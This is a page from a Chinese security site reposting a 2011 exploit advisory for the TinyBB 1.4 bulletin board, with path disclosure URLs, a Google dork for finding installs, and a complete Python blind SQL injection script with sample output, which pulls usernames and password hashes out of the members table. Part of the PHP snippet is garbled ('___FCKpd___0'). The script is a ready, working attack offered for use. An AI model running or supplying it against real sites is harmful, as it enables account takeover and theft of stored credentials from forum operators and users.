首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TinyBB 1.4 Path Disclosure / Blind SQL Injection
来源:flavio[dot]baldassi[at]gmail[dot]com 作者:swami 发布时间:2011-04-15  
# Exploit Title    : TinyBB 1.4 Sql Injection + Path Disclosure
# Google Dork  : "Proudly powered by TinyBB"
# Date              : 7 April 2011
# Author           : swami
# Contact         : flavio[dot]baldassi[at]gmail[dot]com
# Version          : 1.4
# Tested on       : Centos 5.5 with magic_quotes_gpc off
# Thanks to      : ptrace.net
#
#  From tinybb.net
#  -------------------------
#  "TinyBB is a free, simple bulletin board script. TinyBB's community
is slowly growing and the number
#   of installs is slowly rising. TinyBB's software is 100% free and so
are our official add-ons."
#
#  Sql Injection [Fixed]
#  -----------------------
#  The  vulnerability exist in /inc/viewthread.php file at line 3. As
you can see below the 
___FCKpd___0
GET['post'] parameter isn't # properly sanitized. # # $check_thread = mysql_query("SELECT * FROM `tinybb_threads` WHERE # `thread_key` = '
___FCKpd___0
GET[post]'") or die(mysql_error()); # # Path Disclosure [Not fixed] # -------------------- # A remote user can access these files to cause the system to display an error message that indicates the installation # path. # 1- http://host/inc/login.php # 2- http://host/inc/categories.php # #swami@swami-desktop:~/Documents/py$ ./tinybb.py # # [+] TinyBB thread url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648 # [?] Set up a Proxy ? [y/n] y # [+] Proxy ip:port: 127.0.0.1:3128 # [+] Proxy is found to be working # [+] Testing url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648 # [+] Url vulnerable: YES # [+] Users into the db: 1 # [+] Executing blind sql injection, this will take time ... # # [+] UserId 76: admin:64d7103eef2b14bbb2d0b57c38cc3fbee29ff72a # # [+] Done # #!/usr/bin/python # import sys import urllib.request def banner(): print('+ +') print('| ------------------------------ |') print('| TinyBB 1.4 Blind Sql INjector |') print('| ------------------------------ |') print('+ by swami +\n') def setProxy(ip): try: proxy = urllib.request.ProxyHandler( {'http':'http://'+ str(ip) } ) opener = urllib.request.build_opener( proxy ) opener.open('http://www.google.com') print('[+] Proxy is found to be working') except: print('[-] Proxy doesn\'t work') print('[-] Exit ...') sys.exit(1) return opener def testUrl(url, handle): print('[+] Testing url: '+ url) try: req = handle.open( url ) req = req.read().decode('utf-8') except: print('[-] '+ url +' is not a valid url') print('[-] Exit ...') sys.exit(1) return req def urlVulnerable(url, clean, handle): sys.stdout.write('[+] Url vulnerable: ') try: req = handle.open( url + "'" ) req = req.read().decode('utf-8') except: sys.exit('\n[-] Url typing error') if len(clean) > len(req): sys.stdout.write('YES\n') sys.stdout.flush() else: sys.stdout.write('NO\n[-] Exit...\n') sys.stdout.flush() sys.exit(1) def getTrueValue(url, handle): trueValue = handle.open( url + "'%20and%20'1'='1" ) return len( trueValue.read().decode('utf-8') ) def getNUsers(url, trueValue, handle): users = list() sys.stdout.write('[+] Users into the db: ') sys.stdout.flush() for userid in range(1,100): inject = url + "'%20and%20(SELECT%201%20FROM%20members%20WHERE%20id="+ str(userid) +")='1" try: req = handle.open( inject ) req = req.read().decode('utf-8') except: print('[-] Somenthing went wrong') sys.exit(1) if len(req) == trueValue: users.append(userid) sys.stdout.write( str(len(users)) ) return users def doBlind(url, handle, nUserId, trueValue): print('\n[+] Executing blind sql injection, this will take time ...\n') for x in range(len(nUserId)): position = 1 # Line position userid = nUserId[x] char = 33 # Start from ! sys.stdout.write('[+] UserId '+ str(userid) +': ') sys.stdout.flush() # Execute Blind Sql INjection while True: inject = url inject += "'%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20FROM%20" inject += "members%20WHERE%20id="+ str(userid) +"),"+ str(position) +",1))>"+ str(char) +"%20--'" result = handle.open( inject ) result = result.read().decode('utf-8') # If we don't get errors if len(result) == trueValue: char += 1 else: if position > 43 and chr(char) == "!": break else: sys.stdout.write( chr(char) ) sys.stdout.flush() position += 1 char = 33 #Reset char if char == 127 : print('[-] Ascii table is over. Exit... :/') sys.exit(1) print() if __name__ == "__main__": banner() url = input('[+] TinyBB thread url: ') if input('[?] Set up a Proxy ? [y/n] ') == 'y' : handle = setProxy( input('[+] Proxy ip:port: ') ) else: handle = urllib.request.build_opener() clean = testUrl(url, handle) urlVulnerable(url, clean, handle) trueValue = getTrueValue(url, handle) userId = getNUsers(url, trueValue, handle) doBlind(url, handle, userId, trueValue) print('\n[+] Done ')

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xilisoft Video Converter Ultim
·Media Player Classic 6.4.9.1 D
·Winamp 5.6.1 Denial Of Service
·Winamp 5.6.1 .pls Remote Comma
·PlaylistMaker V1.5 .txt File B
·NEdit 5.5 Format String Vulner
·TinyBB v1.4 Blind Sql Injectio
·SimplyPlay v.66 .pls File Buff
·Microsoft Reader <= 2.1.1.3143
·Adobe Flash Player 10.2.153.1
·Microsoft Reader <= 2.1.1.3143
·MS Word Record Parsing Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved